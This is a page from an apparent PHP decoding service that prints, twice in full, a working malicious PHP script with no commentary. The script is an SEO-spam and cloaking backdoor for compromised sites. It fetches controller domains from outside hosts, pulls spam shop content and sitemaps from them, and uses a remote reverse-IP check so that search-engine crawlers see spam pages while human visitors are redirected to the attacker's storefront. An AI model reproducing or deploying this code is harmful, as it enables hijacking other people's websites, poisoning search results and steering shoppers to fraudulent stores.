Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); $http_type = ((isset($_SERVER['HTTP..

Decoded Output download

<?php 
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING); 
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://'; 
$kname = ""; 
$kgurl="https://ilx02.com/10.txt"; 
$kgurl2="http://ilx01.top/jb10.txt"; 
$allurl =file_get_contents($kgurl); 
if(!$allurl){$allurl=file_get_contents($kgurl2);} 
$words = explode("|", $allurl); 
foreach ($words  as  $value){ 
$aaa =file_get_contents($value.'test.txt');if(!$aaa){continue;}else{$jd=$value;break;	}} 
 
if (!is_null($_GET['shop'])) { 
	$kname = $_GET['shop']; 
} 
if (!is_null($_GET['s'])) { 
	$cid = mt_rand(1, 80); 
	if (!is_null($_GET['cid'])) { 
		$cid = $_GET['cid']; 
	} 
 
 
	$url = $jd . "sname.aspx?cid=" . $cid . "&number=" . $_GET['number'] . "&pnum=" . $_GET['pnum']; 
	$str = file_get_contents($url); 
	$str = str_replace('yymm', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str); 
	$str = str_replace('cname', 'shop', $str); 
	header("Content-type:text/xml"); 
	echo $str; 
	exit(); 
} 
function check($ip) 
{ 
	global $jd; 
	if (!is_null($_GET['kk'])) { 
		$ip = "66.249.64.190"; 
	} 
	$domain = file_get_contents($jd . "getdomain.aspx?rnd=1&ip=" . $ip); 
	if (stripos($domain, 'google') != false or stripos($domain, 'msn.com') != false or stripos($domain, 'yahoo.com') != false or stripos($domain, 'aol.com') != false) { 
	} else { 
		if (!is_null($_GET['shop'])) { 
			$kname = $_GET['shop']; 
			$xs = $jd . "a.aspx"; 
			echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>'; 
			exit(); 
		} 
		if (!is_null($_GET['iid'])) { 
			$kname = $_GET['kname']; 
			$xs = $jd . "a.aspx"; 
			echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>'; 
			exit(); 
		} 
		if (!is_null($_GET['pnum'])) { 
			$xs = $jd . "a.aspx"; 
			$txt = str_replace("products.aspx", "", $xs) . "?cid=" . $_GET['cid']; 
			echo '<script>document.location="' . $txt . '"</script>'; 
			exit(); 
		} 
	} 
} 
function getIP() 
{ 
	$ip = $_SERVER['REMOTE_ADDR'] . "*" . $_SERVER['REMOTE_HOST'] . "*" . $_SERVER['HTTP_CLIENT_IP'] . "*" . $_SERVER['HTTP_X_FORWARDED'] . "*" . $_SERVER['HTTP_FORWARDED_FOR'] . "*" . $_SERVER['HTTP_FORWARDED']; 
	return $ip; 
} 
$validate = check(getIP()); 
?>  
<?php 
$url = ""; 
$hyzhdy = $jd . "jd_lb.aspx"; 
if (!is_null($_GET['shop'])) { 
	$kname = $_GET['shop']; 
	$url = $hyzhdy . "?cname=" . urlencode($_GET['shop']) . "&cid=" . $_GET['cid']; 
}  
else if (!is_null($_GET['iid'])) { 
	$kname = $_GET['kname']; 
	$wid = mt_rand(1, 1500); 
	$url = $hyzhdy . "?iid=". $_GET['iid']."&cname=" . urlencode($_GET['kname']) . "&cid=" . $_GET['cid'] . "&mt=" . $jd . "enm/" . $wid . ".txt" . "&yt=" . $jd . "ytbs.txt&you=1"; 
} else { 
	$cid = mt_rand(1, 80); 
	if (!is_null($_GET['cid'])) { 
		$cid = $_GET['cid']; 
	} 
	$url = $hyzhdy . "?cid=" . $cid . "&pnum=" . $_GET['pnum']; 
} 
$ttttt = $kname . " online sales,Up To " . "OFF" . mt_rand(50, 70) . "% |" . $_GET['pnum']; 
$kkkkk = $kname; 
$iiiii = $kname . "  There's a handful of major online auction and sales sites, and as you'll see, some charge much lower fees than others. "; 
$ccccc = $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; 
 
$str = file_get_contents($url); 
$str = str_replace('UUUUU', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str); 
$str = str_replace('HHHHH', $_SERVER['SCRIPT_NAME'], $str); 
$str = str_replace('BBBBB', $_SERVER['HTTP_HOST'], $str); 
$str = str_replace('NNNNN', $kname, $str); 
$str = str_replace('DDDDD', $kname . " Gold, White, Black, Red, Blue, Beige, Grey, Price, Rose, Orange, Purple, Green, Yellow, Cyan, Bordeaux, pink, Indigo, Brown, Silver,Electronics, Video Games, Computers, Cell Phones, Toys, Games, Apparel, Accessories, Shoes, Jewelry, Watches, Office Products, Sports & Outdoors, Sporting Goods, Baby Products, Health, Personal Care, Beauty, Home, Garden, Bed & Bath, Furniture, Tools, Hardware, Vacuums, Outdoor Living, Automotive Parts, Pet Supplies, Broadband, DSL, Books, Book Store, Magazine, Subscription, Music, CDs, DVDs, Videos,Online Shopping.Fast delivery and guaranteed savings! " . $_GET['searchtxt'], $str); 
$str = str_replace('TTTTT', $ttttt, $str); 
$str = str_replace('KKKKK', $kkkkk, $str); 
$str = str_replace('IIIII', $iiiii, $str); 
$str = str_replace('CCCCC', $ccccc, $str); 
$str = str_replace('cname', 'shop', $str); 
echo $str; 
?>

Did this file decode correctly?

Original Code

<?php
error_reporting(E_ALL ^ E_NOTICE ^ E_WARNING);
$http_type = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https')) ? 'https://' : 'http://';
$kname = "";
$kgurl="https://ilx02.com/10.txt";
$kgurl2="http://ilx01.top/jb10.txt";
$allurl =file_get_contents($kgurl);
if(!$allurl){$allurl=file_get_contents($kgurl2);}
$words = explode("|", $allurl);
foreach ($words  as  $value){
$aaa =file_get_contents($value.'test.txt');if(!$aaa){continue;}else{$jd=$value;break;	}}

if (!is_null($_GET['shop'])) {
	$kname = $_GET['shop'];
}
if (!is_null($_GET['s'])) {
	$cid = mt_rand(1, 80);
	if (!is_null($_GET['cid'])) {
		$cid = $_GET['cid'];
	}


	$url = $jd . "sname.aspx?cid=" . $cid . "&number=" . $_GET['number'] . "&pnum=" . $_GET['pnum'];
	$str = file_get_contents($url);
	$str = str_replace('yymm', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
	$str = str_replace('cname', 'shop', $str);
	header("Content-type:text/xml");
	echo $str;
	exit();
}
function check($ip)
{
	global $jd;
	if (!is_null($_GET['kk'])) {
		$ip = "66.249.64.190";
	}
	$domain = file_get_contents($jd . "getdomain.aspx?rnd=1&ip=" . $ip);
	if (stripos($domain, 'google') != false or stripos($domain, 'msn.com') != false or stripos($domain, 'yahoo.com') != false or stripos($domain, 'aol.com') != false) {
	} else {
		if (!is_null($_GET['shop'])) {
			$kname = $_GET['shop'];
			$xs = $jd . "a.aspx";
			echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>';
			exit();
		}
		if (!is_null($_GET['iid'])) {
			$kname = $_GET['kname'];
			$xs = $jd . "a.aspx";
			echo '<script>document.location="' . $xs . "?cid=" . $_GET['cid'] . "&cname=" . urlencode($kname) . '"</script>';
			exit();
		}
		if (!is_null($_GET['pnum'])) {
			$xs = $jd . "a.aspx";
			$txt = str_replace("products.aspx", "", $xs) . "?cid=" . $_GET['cid'];
			echo '<script>document.location="' . $txt . '"</script>';
			exit();
		}
	}
}
function getIP()
{
	$ip = $_SERVER['REMOTE_ADDR'] . "*" . $_SERVER['REMOTE_HOST'] . "*" . $_SERVER['HTTP_CLIENT_IP'] . "*" . $_SERVER['HTTP_X_FORWARDED'] . "*" . $_SERVER['HTTP_FORWARDED_FOR'] . "*" . $_SERVER['HTTP_FORWARDED'];
	return $ip;
}
$validate = check(getIP());
?> 
<?php
$url = "";
$hyzhdy = $jd . "jd_lb.aspx";
if (!is_null($_GET['shop'])) {
	$kname = $_GET['shop'];
	$url = $hyzhdy . "?cname=" . urlencode($_GET['shop']) . "&cid=" . $_GET['cid'];
} 
else if (!is_null($_GET['iid'])) {
	$kname = $_GET['kname'];
	$wid = mt_rand(1, 1500);
	$url = $hyzhdy . "?iid=". $_GET['iid']."&cname=" . urlencode($_GET['kname']) . "&cid=" . $_GET['cid'] . "&mt=" . $jd . "enm/" . $wid . ".txt" . "&yt=" . $jd . "ytbs.txt&you=1";
} else {
	$cid = mt_rand(1, 80);
	if (!is_null($_GET['cid'])) {
		$cid = $_GET['cid'];
	}
	$url = $hyzhdy . "?cid=" . $cid . "&pnum=" . $_GET['pnum'];
}
$ttttt = $kname . " online sales,Up To " . "OFF" . mt_rand(50, 70) . "% |" . $_GET['pnum'];
$kkkkk = $kname;
$iiiii = $kname . "  There's a handful of major online auction and sales sites, and as you'll see, some charge much lower fees than others. ";
$ccccc = $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING'];

$str = file_get_contents($url);
$str = str_replace('UUUUU', $http_type . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('HHHHH', $_SERVER['SCRIPT_NAME'], $str);
$str = str_replace('BBBBB', $_SERVER['HTTP_HOST'], $str);
$str = str_replace('NNNNN', $kname, $str);
$str = str_replace('DDDDD', $kname . " Gold, White, Black, Red, Blue, Beige, Grey, Price, Rose, Orange, Purple, Green, Yellow, Cyan, Bordeaux, pink, Indigo, Brown, Silver,Electronics, Video Games, Computers, Cell Phones, Toys, Games, Apparel, Accessories, Shoes, Jewelry, Watches, Office Products, Sports & Outdoors, Sporting Goods, Baby Products, Health, Personal Care, Beauty, Home, Garden, Bed & Bath, Furniture, Tools, Hardware, Vacuums, Outdoor Living, Automotive Parts, Pet Supplies, Broadband, DSL, Books, Book Store, Magazine, Subscription, Music, CDs, DVDs, Videos,Online Shopping.Fast delivery and guaranteed savings! " . $_GET['searchtxt'], $str);
$str = str_replace('TTTTT', $ttttt, $str);
$str = str_replace('KKKKK', $kkkkk, $str);
$str = str_replace('IIIII', $iiiii, $str);
$str = str_replace('CCCCC', $ccccc, $str);
$str = str_replace('cname', 'shop', $str);
echo $str;
?>

Function Calls

None

Variables

None

Stats

MD5 c425321dfe912327ffbbb8b6fe54e5d8
Eval Count 0
Decode Time 59 ms